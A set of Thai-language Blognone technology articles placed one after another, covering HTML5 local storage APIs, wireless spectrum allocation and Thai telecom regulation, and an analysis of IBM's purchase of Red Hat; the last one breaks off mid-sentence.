มากกว่าที่เห็นในปัจจุบันอีกหลายเท่าครับ - ไม่ว่าจะเกลียดกันเพียงไหน ซัมซุงจะยังผลิตชิ้นส่วนให้แอปเปิลต่อไปเหมือนเดิม กูเกิลจะยังทำแอพให้ iOS ต่อไปเช่นเดิม (รอดู Google Maps/YouTube for iOS ได้เลย) หรือเยอะกว่าเดิมด้วยซ้ำ
# รู้จักกับวิธีการเก็บข้อมูล Local Storage ของ HTML5 HTML5 ประกอบด้วยเทคโนโลยีหลายส่วน เช่น แท็กแบบใหม่ๆ, audio/video, canvas, geolocation ฯลฯ ส่วนประกอบหนึ่งที่สำคัญไม่น้อยแต่คนไม่ค่อยพูดถึงเท่าไรคือความสามารถของ "เว็บเพจ" (หรืออาจเรียกมันว่าเป็น "เว็บแอพพลิเคชัน" ก็ได้) ในการเก็บข้อมูลแบบออฟไลน์ ซึ่งก็แยกย่อยได้อีกหลายชนิดมาก (HTML4 เก็บได้เฉพาะคุกกี้เล็กๆ นิดเดียว) เว็บไซต์ InfoWorld สรุปมาสั้นๆ ดี ผมเลยมาสรุปอีกทีให้สั้นกว่าเดิม เพื่อคนที่สนใจ HTML5 จะไปตามต่อได้ถูกครับ ### Web Storage เทคโนโลยีแรกคือ Web Storage ซึ่งเป็นการเก็บข้อมูลแบบง่ายๆ ในรูป key-value (ภาษาโปรแกรมบางภาษาเรียก dictionary) ซึ่งแยกย่อยได้อีก 2 อย่าง คือ - **Session storage** เก็บข้อมูลเฉพาะเซสชันการท่องเว็บนั้นๆ ปิดแท็บเมื่อไรข้อมูลก็หายไป ใช้ออบเจคต์ชนิด sessionStorage อันนี้ไม่ซับซ้อน - **Local storage** เก็บข้อมูลระยะยาว (persistence) โดยใช้ออบเจคต์ชื่อ localStorage ซึ่งจะซับซ้อนขึ้น เพราะเราสามารถเปิดเว็บเพจเดียวกันใน 2 แท็บหรือมากกว่า ซึ่งมันจะแชร์ข้อมูลก้อนเดียวกัน ฟีเจอร์ Web Storage จะคล้ายกับ Google Gears เมื่อ 3-4 ปีก่อนหน้านี้ เพียงแต่ Web Storage รวมมากับ HTML5 เลย ไม่ต้องลงปลั๊กอินเพิ่มเองแบบ Gears ### ฐานข้อมูล การเก็บข้อมูลง่ายๆ แบบ key-value อาจไม่เพียงพอต่อความต้องการของนักพัฒนา HTML5 จึงเพิ่มวิธีการเก็บข้อมูลที่ซับซ้อนขึ้นมา ซึ่งก็คือฐานข้อมูลแบบที่เราคุ้นเคยนั่นเอง ปัญหาของฐานข้อมูลใน HTML5 ก็คือมาตรฐานที่แยกเป็นสองทาง - **Web SQL Database** มันคือการนำ SQL มายัดใส่เบราว์เซอร์ (ส่วนมากนิยม SQLite) ตอนนี้ใช้ได้แค่เบราว์เซอร์ตระกูล WebKit และ Opera แนวทางนี้มีข้อเสียตรงความซับซ้อนของ SQL และเริ่มหมดความนิยมแล้ว (ทั้งที่มาตรฐานยังไม่เสร็จ) - **IndexedDB** แนวทางใหม่ที่สร้างขึ้นในภายหลัง ไม่ใช้ SQL แต่เก็บข้อมูลแบบ key-value เหมือนกับ Web Storage เพียงแต่เพิ่มการทำดัชนี (index) ช่วยให้หาข้อมูลได้รวดเร็วขึ้น และเพิ่มเรื่อง transactions เพื่อความปลอดภัยของข้อมูลมาด้วย Blognone เคยลงเรื่อง [Web SQL vs IndexedDB](http://www.blognone.com/node/15389) ไปครั้งหนึ่งแล้ว ย้อนอ่านรายละเอียดได้ในตอนเก่าครับ ### File API เราพูดถึงการเก็บข้อมูลแบบง่ายๆ และการเก็บลงฐานข้อมูลไปแล้ว ลำดับถัดไปคือการจัดการกับ "ไฟล์" นั่นเอง HTML5 มี API มาให้เราสองตัวคือ FileReader กับ FileWriter หน้าที่ก็ตามชื่อครับ ปัญหาของ FileReader ที่จะต้องสนใจคือความแตกต่างระหว่างไฟล์ที่อยู่ในเครื่อง กับไฟล์ที่อยู่บนเว็บ ซึ่งกำลังพัฒนากันอยู่ ส่วน FileWriter มีข้อกังวลเรื่องความปลอดภัย เพราะต่อจากนี้ไปเว็บเพจจะสามารถ**เขียนไฟล์ในเครื่องเราได้** มาตรการแก้ไขจุดอ่อนนี้ก็ต้องพัฒนากันต่อไป ### แคชสำหรับเวลาออฟไลน์ เมื่อเว็บแอพพลิเคชันไม่ได้ต่อเน็ต ก็ต้องมีวิธีจัดการกับข้อมูลที่เกิดขึ้นระหว่างนั้น ซึ่งเป็นหน้าที่ของ **AppCaching API** ที่บอกว่าเว็บแอพพลิเคชันจะถูกเก็บไว้บนเครื่องนานแค่ไหน ทำให้เว็บแอพมีลักษณะคล้ายๆ กับแอพที่ติดตั้งแบบปกติมากขึ้น รายละเอียดของวิธีการเก็บข้อมูลแต่ละชนิด ไปตามต่อกันใน HTML5 Tutorial กันเองนะครับ ที่มา \- [InfoWorld](http://infoworld.com/d/developer-world/html5-in-the-browser-local-data-storage-806?page=0,0)
# สิ่งที่คุณควรรู้ในการอ่านข่าวโทรคมนาคมไร้สาย ช่วงหลังๆ นี่ Blognone มีข่าวโทรคมนาคมจำนวนมากทั้งในไทยและต่างประเทศ แต่ผมพบว่าความเห็นจำนวนมากนั้นจะซ้ำไปมาจากความเข้าใจผิดในความรู้พื้นฐาน ผมจึงตัดสินใจว่าถึงเวลาที่จะเขียนบทความเพื่อสร้างความเข้าใจให้ตรงกันเสียที บทความนี้เน้นระบบ โทรคมนาคมไร้สาย เช่นโทรศัพท์มือถือ หรือการสื่อสารดาวเทียม ฯลฯ นะครับ ผมจะไม่ลงไปอุตสาหกรรมอื่นๆ ที่เราอาจจะเจอคาบเกี่ยวกันบ่อยๆ เช่นโทรทัศน์วิทยุ (ที่ใช้คลื่นความถี่เหมือนกัน), หรือโทรคมอื่นๆ (เช่นโทรศัพท์บ้าน, ADSL, หรือบริการสายไฟเบอร์) เพื่อไม่ให้ลากยาวลงฟิสิกส์พื้นฐานมากเกินไป เราทำความรู้จักกับคลื่นความถี่ คือในธรรมชาติ ทั้งในชั้นบรรยากาศโลกและ เราสามารถส่งพลังงานไปถึงกันได้ในรูปแบบหนึ่งของคลื่นเรียกว่าคลื่นแม่เหล็กไฟฟ้า หรือนิยมเรียกว่าคลื่นวิทยุ โดยคลื่นแม่เหล็กไฟฟ้านี่มีหลายแบบจำแนกตาม "ความถี่" (frequency) เช่น คลื่นวิทยุ FM ที่เราใช้ฟังวิทยุนั้นเราเรียกว่าคลื่น VHF (Very High Frequency) มีช่วงตั้งแต่ 30MHz ไปจนถึง 300MHz มนุษย์เราสามารถส่งข้อมูลข่าวสารผ่านคลื่นความถี่วิทยุได้ตั้งแต่ช่วงปี 1909 ที่เราอาจจะเคยได้ยินกันว่าเป็นโทรเลขไร้สายของมาโคนี ตัวคลื่นความถี่นั้นเป็นคลื่นรูปแบบหนึ่ง โดยตัวมันเองไม่มีข้อมูลอะไรนอกจากเป็นพลังงานที่เคลื่อนที่ไปเรื่อยๆ แต่เมื่อเราประยุกต์ จึงต้องมีการนำข้อมูลเข้าไปขี่กับคลื่น (เรียกว่า modulate) เพื่อให้คลื่นความถี่นำพาข้อมูลที่เราต้องการไปด้วย ยุคสมัยแรกๆ การ modulate ก็ง่ายมาก เราปล่อยคลื่นแรงๆ สลับกับคลื่นเบาๆ เพื่อให้เป็นเสียงเป็นจังหวะเพื่อการส่งโทรเลข เป็นเสียงแต๊กๆ ที่เราเคยได้ยินในหนัง แต่ต่อมาก็มีพัฒนาการมากขึ้น การ modulate เริ่มซับซ้อนขึ้นเรื่อยๆ จนเราสามารถส่งข้อมูลเสียง (เป็นวิทยุ) ข้อมูลภาพ (เป็นโทรทัศน์) ชื่อที่เราเคยได้ยินดันเช่น AM นั้นย่อมาจาก Amplitude Modulation ซึ่งเป็นเทคนิคการนำเสียงไปกับคลื่นวิทยุแบบหนึ่ง ชื่ออื่นๆ ที่เราอาจจะได้ยินอีกก็เช่น FM ก็เป็นเทคนิคการนำข้อมูลไปกับคลื่นความถี่อีกแบบหนึ่ง การส่งข้อมูลเองก็มีการส่งข้อมูลทั้งแบบอนาล็อกและดิจิตอล การส่งแบบอนาล็อกคือการส่งข้อมูลต่อเนื่องเช่นเสียง หรือภาพเข้าไปกับคลื่นโดยตรง แต่การส่งแบบดิจิตอลนั้นเป็นการส่ง "ตัวเลข" (digit แปลว่าตัวเลข digital อาจจะเรียกได้ว่าเป็น "เชิงตัวเลข") ข้อมูลทั้งหมดจะถูกแปลงให้อยู่ในตัวเลข แล้วส่งไปกับคลื่นความถี่ แต่หลักการพื้นฐานของการใช้คลื่นความถี่คือการจะรับส่งข้อมูลนั้น ต้องมีการ "จอง" ความถี่ของเสียก่อน แล้วจัดการการส่งข้อมูล เช่นสถานีวิทยุ 106.5 MHz ก็ต้องมีการระบุว่าใครจะมีสิทธิส่งคลื่นในย่านนั้นบ้าง เนื่องจากความถี่ที่ใกล้เคียงกันมักจะมีการรบกวนกันเป็นปรกติ เวลาจองคลื่นความถี่จึงต้องจองเป็น "ย่าน" (band) เช่น คลื่น 106.5MHz นั้นจริงๆ แล้วจะได้รับคลื่นตั้งแต่ 106.375MHz ไปจนถึง 106.625 เป็นต้น การ modulate ข้อมูลในยุคแรกๆ เช่นวิทยุ AM นั้นใช้คลื่นความถี่เปลืองเมื่อเทียบกับข้อมูลที่ส่งได้ คือส่งข้อมูลเสียงได้คุณภาพต่ำ ขณะที่ใช้ย่านความถี่กว้างเพราะเทคนิคการ modulate นั้นเก่ามาก ส่วนการ modulate ยุคใหม่ๆ นั้นใช้คลื่นความถี่ประหยัดกว่าเดิมมาก เช่นทุกวันนี้ที่เราใช้งานการเทคนิคใหม่ๆ ในมาตรฐาน 802.11b หรือ 802.11n ก็จะส่งข้อมูลได้มากกว่าเดิมทั้งที่ใช้ย่านความถี่เท่าเดิม คลื่นความถี่นั้นมีจำกัด โดยทั่วไปเรามักใช้ความถี่ต่ำกว่า 300GHz ลงมาเพื่อใช้งาน และหากมีการใช้ซ้ำซ้อนกันก็จะเกิดอาการรบกวนกันเองจนกระทั่งไม่มีใครใช้งานได้เลยในที่สุด รัฐบาลทั่วโลกจึงมองว่าคลื่นความถี่เป็นสมบัติของชาติ คนทั่วไปไม่สามารถเข้าใช้งานได้อย่างอิสระ แม้ในความเป็นจริงการผลิตเครื่องส่งวิทยุจะไม่ใช่เรื่องซับซ้อนเท่าใดนักก็ตาม ขณะที่รัฐบาลทั่วโลกห้ามไม่ให้ประชาชนเข้าใช้งาน ก็มีการนำคลื่นความถี่เหล่านี้อนุญาตให้คนบางกลุ่มด้วยกระบวนการต่างๆ เช่นทหารสามารถใช้คลื่นความถี่บางย่าน หรืออนุญาตเป็นกรณีพิเศษให้กับกิจการของรัฐบาลเพื่อให้บริการกับประชาชน ตลอดจนการให้สัมปทานกับเอกชนบางรายเพื่อให้บริการกับประชาชน แต่ต่อมาแนวคิดการที่รัฐบาลจะทำกิจการของตัวเองก็เริ่มหายไปทั่วโลก รัฐบาลต่างๆ เริ่มหาทางให้เอกชนสามารถเข้ามาแย่งชิงคลื่นความถี่ได้อย่างเป็นระบบ เพื่อให้คลื่นความถี่ถูกใช้งานอย่างคุ้มค่า โดยตั้งหน่วยงานขึ้นมาดูแลโดยตรง เช่น FCC ของสหรัฐฯ, Ofcom ของอังกฤษ, หรือกสทช. ของไทย หน่วยงานเหล่านี้มีหน้าที่กำกับดูแลทั้งการใช้คลื่นวิทยุ และอุปกรณ์ที่ใช้คลื่นวิทยุได้ เรามักจะเห็นตรา FCC ในโทรศัพท์มือถือ หรือเครื่องใช้ไฟฟ้าต่างๆ นั่นเป็นเพราะสหรัฐฯ จะมีกฏหมายระบุให้เครื่องใช้ไฟฟ้าที่ปล่อยคลื่นความถี่ได้ต้องผ่านกระบวนการตรวจสอบของ FCC เสียก่อนว่าจะไม่ส่งคลื่นรบกวนอุปกรณ์อื่นๆ มากจนเกินไป ขณะเดียวกันก็ให้ใบอนุญาตกับผู้ที่ต้องการประกอบกิจการด้วยคลื่นความถี่ เช่นต้องการให้บริการโทรศัพท์มือถือ หรือต้องการตั้งสถานีวิทยุก็ต้องไปขออนุญาตจากหน่วยงานเหล่านี้ โดยหน่วยงานเหล่านี้ก็จะพิจารณาแต่ละย่านว่าจะนำไปใช้อะไร และจะจัดสรรอย่างไรบ้าง การจัดสรรปรกติคือการประมูล โดยหน่วยงานกลางเหล่านี้จะหาคลื่นมาเป็นช่วงใหญ่ๆ ซึ่งมักจะเป็นคลื่นย่านใกล้ๆ กันที่สามารถใช้เทคโนโลยีเดียวกันได้ เช่นคลื่น 3G นั้นเรามักพูดถึงคลื่น 2100MHz ซึ่งหมายถึงคลื่นย่าน 1920MHz ไปจนถึง 2170MHz แล้วจัดประมูลคลื่นความถี่เหล่านี้ให้กับอาจจะหลายๆ รายพร้อมกัน เช่นเมื่อปีที่แล้วที่ไทยจัดการประมูลคลื่น 2100 นั้นก็มีการแบ่งให้ผู้เข้าประมูล 3 ราย ไม่เท่ากัน กระบวนการประมูลเหล่านี้เป็นการนำเงินเข้าสู่รัฐ ในขณะเดียวกันก็เป็นการรับรองว่าผู้ที่ได้คลื่นเหล่านี้ไปจะนำมาใช้งานให้เกิดประโยชน์สูงสุด (เพราะจ่ายเงินไปมากแล้ว) นอกจากการประมูลหรือการให้ทหารใช้เพื่อความมั่นคงแล้ว ยังมีวิธีการอื่นๆ โดยเฉพาะที่เราใช้งานกันมากคือการ "แจกฟรี" คลื่นให้ประชาชนทั่วไปใช้งานโดยตรง โดยเป็นข้อตกลงร่วมกันทั่วโลกว่าคลื่นแต่ละช่วงควรมีการกันส่วนเล็กๆ เอาไว้ให้ประชาชนเข้าใช้งานได้โดยไม่ต้องขออนุญาตล่วงหน้า เรียกว่า ISM Band (industrial, scientific and medical bands) เหตุผลเช่นนี้ทำให้เราสามารถให้บริการอินเทอร์เน็ตผ่าน Wi-Fi (คลื่น 2.4GHz) ได้โดยไม่ต้องขออนุญาตจากใครล่วงหน้า โดยจะกำหนดความแรงของการส่งสัญญาณไว้ให้ต่ำเพื่อให้ทุกคนใช้งานร่วมกันได้โดยไม่รบกวนกันมากเกินไปนัก เช่นคลื่น 2.4GHz นั้นแทบทุกประเทศในโลกกำหนดความแรงสูงสุดไว้ที่ 100mW หรือบางประเทศเช่นสหรัฐฯ นั้นกำหนดไว้ที่ 1W เทคโนโลยีแต่ละตัวนั้นมักออกแบบมาเพื่อใช้กับคลื่นความถี่บางย่านเท่านั้น เช่น Wi-Fi นั้นใช้กับคลื่น 2.4/5GHz ซึ่งเป็นย่าน ISM ทั้งคู่จึงไม่ต้องขออนุญาตล่วงหน้า ส่วนเทคโนโลยี GSM นั้นใช้คลื่น 900/1800 ที่ต้องขออนุญาตล่วงหน้า เช่นเดียวกับเทคโนโลยี WiMAX ที่ใช้คลื่นย่าน 2.3GHz ก็ต้องขออนุญาตเช่นกัน ประเทศไทยก่อนหน้านี้ในรัฐธรรมนูญฉบับ 2540 นั้นกำหนดให้มีสองหน่วยงานในการจัดสรรคลื่นความถี่คือ กทช. และกสช. เพื่อจัดสรรคลื่นความถี่ในสองอุตสาหกรรม คือ กทช. จัดสรรในเรื่องของโทรคม (อินเทอร์เน็ต, โทรศัพท์, ฯลฯ) และกสช.จัดสรรในส่วนของวิทยุโทรทัศน์ อย่างไรก็ตามด้วยปัญหาทางกฏหมาย กสช. นั้นไม่สามารถเกิดขึ้นได้ และกทช. นั้นก็ติดปัญหาที่ไม่สามารถจัดสรรคลื่นความถี่ได้เพราะกฏหมายกำหนดให้ทั้งสองหน่วยงานออกแผนแม่บทร่วมกันเสียก่อน รัฐธรรมนูญ 2550 กำหนดให้มีหน่วยงานดูแลคลื่นความถี่เพียงหน่วยงานเดียวคือ กสทช. ซึ่ง[โปรดเกล้าฯ ไปเมื่อวันที่ 8 ตุลาคมที่ผ่านมา](https://www.blognone.com/news/26934/%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B8%94%E0%B9%80%E0%B8%81%E0%B8%A5%E0%B9%89%E0%B8%B2%E0%B8%AF-%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%95%E0%B8%B1%E0%B9%89%E0%B8%87-%E0%B8%81%E0%B8%AA%E0%B8%97%E0%B8%8A-%E0%B8%97%E0%B8%B1%E0%B9%89%E0%B8%87-11-%E0%B8%84%E0%B8%99%E0%B9%81%E0%B8%A5%E0%B9%89%E0%B8%A7-%E0%B9%80%E0%B8%A3%E0%B8%B4%E0%B9%88%E0%B8%A1%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%8A%E0%B8%B8%E0%B8%A1%E0%B8%99%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A3%E0%B8%81-10-%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%E0%B8%99%E0%B8%B5%E0%B9%89) โดยกฏหมาย (ซึ่งออกมาตามที่รัฐธรรมนูญกำหนด) ได้กำหนดให้กสทช. ต้องออกแผนแม่บทการบริหารคลื่นความถี่ ตารางกำหนดคลื่นความถี่แห่งชาติ แผนแม่บทกิจการกระจายเสียงและกิจการโทรทัศน์ แผนแม่บทกิจการโทรคมนาคม แผนความถี่วิทยุและแผนเลขหมายโทรคมนาคม ให้เรียบร้อยเสียก่อนที่จะเริ่มจัดสรรได้ หรือยกเว้นกรณีที่เป็นบริการสาธารณะ (ไม่ได้ทำกำไร) ก็สามารถขอจัดสรรไปก่อนแผนเหล่านี้ได้เช่นกัน ในระหว่างนี้ร่างแผนแม่บทต่างๆ กำลังเริ่มเสร็จ และทางกสทช. กำลังจะนำร่างออกมาสู่สาธารณะเพื่อรับฟังความคิดเห็น จากนั้นจึงประกาศบังคับใช้ เพื่อเริ่มประมูลต่อไป โดยระหว่างนี้ผู้ที่ได้รับใบอนุญาตไปแล้วจะสามารถใช้ใบอนุญาตต่อไปได้จนกว่าจะหมดอายุ
# บทวิเคราะห์ เพราะเหตุใด IBM ถึงต้องซื้อกิจการ Red Hat ด้วยมูลค่าสูงถึง 1.1 ล้านล้านบาท ข่าว [IBM ซื้อกิจการ Red Hat](https://www.blognone.com/node/106116) ถือเป็นข่าวใหญ่ของโลกไอทีในสัปดาห์นี้ ด้วยมูลค่าการซื้อกิจการที่สูงถึง 34 พันล้านดอลลาร์ ถือเป็นการซื้อกิจการบริษัทไอที่ที่มีมูลค่าสูงเป็นอันดับสามของประวัติศาสตร์ (อันดับหนึ่งคือ Dell+EMC มูลค่า 67 พันล้านดอลลาร์ อันดับสองคือบริษัทอุปกรณ์สื่อสาร JDS Uniphase Corporation ซื้อ SDL มูลค่า 41 พันล้านดอลลาร์ในปี 2000) หลายคนอาจสงสัยว่าดีลนี้เกิดขึ้นได้อย่างไร แถมยังเป็นข่าวเงียบแบบไม่มีใครระแคะระคายมาก่อน อีกทั้ง 2 บริษัทก็มีสถานะการเงินที่แข็งแกร่ง ไม่ได้ต้องการซื้อ/ขายเพื่อเลี่ยงสภาวะขาดทุนหรือล้มละลาย บทความนี้คือการวิเคราะห์เพื่อพยายามตอบคำถามข้างต้น ### สถานการณ์ของ IBM: เซิร์ฟเวอร์หดหาย, คลาวด์ไม่รุ่ง แต่ AI ยังไม่มา เพื่อให้เข้าใจความหมายของการซื้อกิจการครั้งนี้ สิ่งสำคัญที่สุดที่ต้องพิจารณาคือสถานการณ์ของ IBM ตอนนี้เป็นอย่างไร IBM ก่อตั้งมายาวนานเกิน 100 ปี มีธุรกิจหลากหลายประเภท ทั้งฮาร์ดแวร์ ซอฟต์แวร์ บริการ ฯลฯ แต่ปัญหาของ IBM คือโมเดลธุรกิจแบบเดิมๆ นั่นคือการขายเครื่องฮาร์ดแวร์ + ไลเซนส์ซอฟต์แวร์ เริ่มล้าสมัยและขายไม่ได้แล้วในยุคของคลาวด์ IBM รู้เรื่องนี้เป็นอย่างดีและพยายามปรับตัว บริษัทพยายามปั้นธุรกิจคลาวด์ Bluemix มาตั้งแต่ปี 2013 และ[ใช้การซื้อกิจการเข้าช่วยเร่งความเร็วด้วยการซื้อ SoftLayer ในปีเดียวกัน](https://www.blognone.com/node/45026) (ปัจจุบันทั้งสองตัวรวมเป็น IBM Cloud) แต่ธุรกิจคลาวด์ของ IBM ก็ยังไปได้ไม่ไกลมากนัก เมื่อเทียบกับคู่แข่งร่วมวงการทั้ง AWS, Microsoft, Google จาก[ข้อมูลส่วนแบ่งตลาดของ Synergy Research Group เมื่อเดือนตุลาคม 2018](https://www.srgresearch.com/articles/leading-cloud-providers-increase-their-market-share-again-third-quarter) ผู้ให้บริการคลาวด์ที่มีส่วนแบ่งตลาดสูงสุดคือ AWS ตามด้วย Azure, IBM, Google Cloud Platform แต่หากดู[บทวิเคราะห์ของ Synergy ที่ออกมาก่อนหน้านั้นเล็กน้อย](https://www.srgresearch.com/articles/cloud-revenues-continue-grow-50-top-four-providers-tighten-grip-market) จะวาง AWS ในฐานะผู้นำแบบทิ้งห่าง และมี Azure, Google, Alibaba อยู่ในกลุ่มอันดับรองๆ ที่เติบโต ในขณะที่ IBM (รวมถึงเพื่อนร่วมรุ่นอย่าง Oracle และ Salesforce) ถูกจัดอยู่ในกลุ่ม niche player ที่ไม่มีอิทธิพลต่อตลาดในภาพรวมมากนัก (ส่วนแบ่งตลาดของ IBM อยู่ที่ราว 8%) นอกจากธุรกิจคลาวด์แล้ว IBM ยังพยายามรุกตลาด data และ AI ด้วยผลิตภัณฑ์แบรนด์ Watson (ที่มีผลิตภัณฑ์ย่อยมากมาย) Watson อาจสร้างความน่าสนใจในแง่การตลาดได้ (เกาะคำว่า data/AI ยังไงคนก็สนใจ) แต่รายได้จริงๆ ของ Watson อาจไม่ได้เยอะตามไปด้วย ทั้งปัจจัยเรื่องเทคโนโลยี AI ยังไม่พร้อม, ลูกค้าที่ใช้งานยังไม่พร้อม-มีข้อมูลไม่เพียงพอ หรือลูกค้าวิเคราะห์ข้อมูลแล้วก็ยังไม่สามารถแปรเปลี่ยนเป็นตัวเงินได้เช่นกัน เว็บไซต์ [TechCrunch](https://techcrunch.com/2018/10/28/forget-watson-the-red-hat-acquisition-may-be-the-thing-that-saves-ibm/) ก็รายงานข่าวถึงลูกค้า Watson ในสายการแพทย์หลายราย ที่ตื่นเต้นกับ AI ในช่วงแรกๆ แต่กลับถอนตัวหลังลองทดสอบระบบไปได้สักระยะหนึ่ง หากดูโครงสร้างรายได้ของ IBM ตามตาราง จะเห็นว่า IBM แบ่งหมวดรายได้เป็น 5 หมวดใหญ่ๆ คือ - **Cognitive Solutions** ซอฟต์แวร์ธุรกิจ รวมส่วน AI/Watson - **Global Business Services** ธุรกิจให้คำปรึกษา - **Technology Services & Cloud Platforms** ซอฟต์แวร์โครงสร้างพื้นฐาน รวมถึงคลาวด์ - **Systems** ฮาร์ดแวร์และระบบปฏิบัติการ - **Global** Financing ธุรกิจด้านการเงิน จะเห็นว่ารายได้ของ IBM หลายส่วนติดลบจากไตรมาสเดียวกันของปีก่อน จุดที่น่าสนใจคือรายได้กลุ่ม Cognitive Solutions ลดลง และรายได้จากลุ่มโครงสร้างพื้นฐาน/คลาวด์ก็ไม่เติบโต สถานการณ์ของ IBM ในปัจจุบันจึงพอสรุปได้ว่า - **สินค้าในอดีต** ฮาร์ดแวร์และซอฟต์แวร์เสื่อมถอย - **สินค้าในปัจจุบัน** คลาวด์ไม่เติบโต - **สินค้าในอนาคต** AI ยังไม่มาอย่างที่คิดไว้ รายได้ในภาพรวมของ IBM ถดถอยมาติดต่อกันหลายปี [แม้พลิกกลับมาเติบโตเป็นบวกครั้งแรกในรอบ 6 ปีได้ในไตรมาสสุดท้ายของปี 2017](https://www.blognone.com/node/99199) และเติบโตติดต่อกันได้อีกสองไตรมาส แต่[รายได้ในไตรมาสที่สามของปี 2018 ที่เพิ่งประกาศออกมา รายได้ก็กลับมาถดถอยอีกครั้ง](https://www.blognone.com/node/105906) นั่นแปลว่าสถานการณ์ทางการเงินของ IBM ถึงแม้ยังแข็งแกร่งและไม่ล้มละลายง่ายๆ แต่ภาพรวมคือไม่เติบโต ซึ่งไม่เป็นผลดีในระยะยาว (เทียบกับบริษัทในระดับใกล้ๆ กันแล้ว IBM มีรายได้ประมาณไตรมาสละ 20 พันล้านดอลลาร์ ในขณะที่[ไมโครซอฟท์มีรายได้ไตรมาสละ 29 พันล้านดอลลาร์ แต่เติบโตต่อเนื่องทุกไตรมาส](https://www.blognone.com/node/106061)) หุ้นของ IBM ในรอบ 5 ปีล่าสุดก็สะท้อนความจริงอันนี้ โดยหุ้นตกมาเรื่อยๆ นับตั้งแต่จุดสูงสุดช่วงปี 2014 ที่ราคาเกือบ 200 ดอลลาร์ ล่าสุดราคาหุ้นอยู่ที่ประมาณ 120 ดอลลาร์เท่านั้น สิ่งที่ IBM คิดจะทำในการซื้อกิจการ Red Hat คือเลิกหวังน้ำบ่อหน้า รายได้จาก AI เป็นเรื่องของอนาคตระยะไกล แต่เบื้องต้นขอกลับมายังพื้นฐาน ปรับทัพด้านคลาวด์เพื่อสู้ศึกเฉพาะหน้าก่อน ### Red Hat ไม่ได้มีแค่ลินุกซ์ เมื่อพูดถึง Red Hat แน่นอนว่าทุกคนย่อมคิดถึงลินุกซ์ และผลิตภัณฑ์หลักของบริษัทคือ Red Hat Enterprise Linux (RHEL) ก็ถือเป็นมาตรฐานของลินุกซ์สำหรับโลกองค์กรมายาวนาน แถมทำรายได้ให้บริษัทเป็นกอบเป็นกำจากโมเดล subscription แต่ปัจจุบัน Red Hat ไม่ได้เป็นบริษัทที่มีแต่ลินุกซ์เพียงอย่างเดียวอีกต่อไป หาก[เข้าไปดูในเว็บไซต์ Red Hat](https://www.redhat.com/en/technologies/all-products) จะเห็นการแบ่งผลิตภัณฑ์ออกเป็น 8 หมวดหมู่ ผลิตภัณฑ์ตัวอื่นนอกจาก RHEL แล้วยังมี - **JBoss** มิดเดิลแวร์สำหรับสร้างแอพพลิเคชัน Java ในตลาดองค์กร - **Red Hat Virtualization (RHV)** ดิสโทร KVM สำหรับงาน virtualization บนลินุกซ์ ([ข่าวเก่า](https://www.blognone.com/node/84933)) - **Red Hat OpenStack** ดิสโทร OpenStack เชิงพาณิชย์ สำหรับสร้างคลาวด์ในองค์กร - **Red Hat OpenShift** ดิสโทร Kubernetes เชิงพาณิชย์ สำหรับรันแอพพลิเคชันบนคลาวด์ รวมถึงส่วน [CoreOS ที่เพิ่งซื้อกิจการมา](https://www.blognone.com/node/99496) - **Gluster / Ceph** ซอฟต์แวร์สำหรับทำสตอเรจแบบ software-defined - **Ansible** ซอฟต์แวร์สำหรับคอนฟิกเซิร์ฟเวอร์และทำ automation ([ข่าวเก่า](https://www.blognone.com/node/96222)) หากดูสัดส่วนรายได้ของ Red Hat จะเห็นว่าบริษัทมีการแยกรายได้เป็น 3 กลุ่มหลักๆ ได้แก่ - **Infrastructure-related tech** หมายถึง RHEL และ RHV คิดเป็นสัดส่วนรายได้ประมาณ 64% - **App Dev & emerging tech** หมายถึงธุรกิจด้านแอพพลิเคชันอย่าง JBoss, Red Hat Storage รวมถึงธุรกิจใหม่ๆ อย่าง OpenStack, OpenShift, Ansible มีสัดส่วนรายได้ 24% - **Training & Consulting** ธุรกิจด้านการอบรมและให้คำปรึกษา สัดส่วนรายได้ 14% จะเห็นว่าธุรกิจฝั่ง RHEL ยังเป็นธุรกิจหลักที่สร้างรายได้ให้ Red Hat แต่ก็มีธุรกิจอื่นๆ ที่ช่วยกระจายโครงสร้างรายได้ให้ Red Hat อีกพอสมควร คิดเป็นราว 1/3 ของรายได้ทั้งหมด ### IBM + Red Hat มุ่งเจาะตลาดไฮบริดคลาวด์ ในภาพรวมแล้ว Red Hat กำลังเปลี่ยนตัวเองจากบริษัทที่มีแต่ลินุกซ์ ทำแต่ตัวระบบปฏิบัติการ กลายมาเป็นบริษัทที่พัฒนาซอฟต์แวร์โครงสร้างพื้นฐาน (infrastructure) และกำลังขยายตัวไปยังตลาดซอฟต์แวร์เพื่อการพัฒนาแอพพลิเคชัน (application development) อีกด้วย พูดง่ายๆ คือปัจจุบันเราอาจไม่ต้องมีเซิร์ฟเวอร์เป็นของตัวเองอีกแล้ว เพราะเช่าคลาวด์เอาได้ แต่ก็มีโอกาสสูงที่เราจ่ายเงินเช่าคลาวด์จาก AWS, Microsoft หรือ Google แล้วมาเสียค่าไลเซนส์ซอฟต์แวร์บางตัวให้ Red Hat อีกต่อหนึ่ง (ตัวหลักคือ RHEL แต่เราก็อาจใช้ Ansible หรือ JBoss ได้ด้วย) ตรงนี้คือสิ่งที่ IBM ต้องการ เพราะ IBM อ่อนแอในตลาดคลาวด์แบบ public cloud ที่โดนคู่แข่งรายใหญ่ทิ้งห่าง โอกาสเดียวที่ยังเหลืออยู่คือตลาดไฮบริดคลาวด์ (hybrid cloud) ที่ยังเป็นลูกผสมระหว่างคลาวด์แบบใหม่กับเซิร์ฟเวอร์แบบเก่า โดยไม่อิงกับบริการคลาวด์ของ IBM เพียงอย่างเดียว และตลาดนี้ยังขยายตัวอยู่เรื่อยๆ ตามกระแส digital transformation ขององค์กรต่างๆ IBM เองก็รับรู้เรื่องนี้ดี และพยายามพัฒนาซอฟต์แวร์มาเจาะตลาดนี้ เช่น Cloud Private หรือ [Multicloud Manager](https://www.blognone.com/node/106019) ที่เป็น Kubernetes และออกแบบมาเพื่อการรันบนคลาวด์หลากหลายยี่ห้อ อย่างไรก็ตาม ซอฟต์แวร์ที่ IBM มีให้ ก็ยังห่างไกลกับสารพัดซอฟต์แวร์ที่ Red Hat มีอยู่ในมือ โดยเฉพาะ RHEL ที่เป็นจิ๊กซอสำคัญสำหรับสถาปัตยกรรมคอนเทนเนอร์ยุค Kubernetes 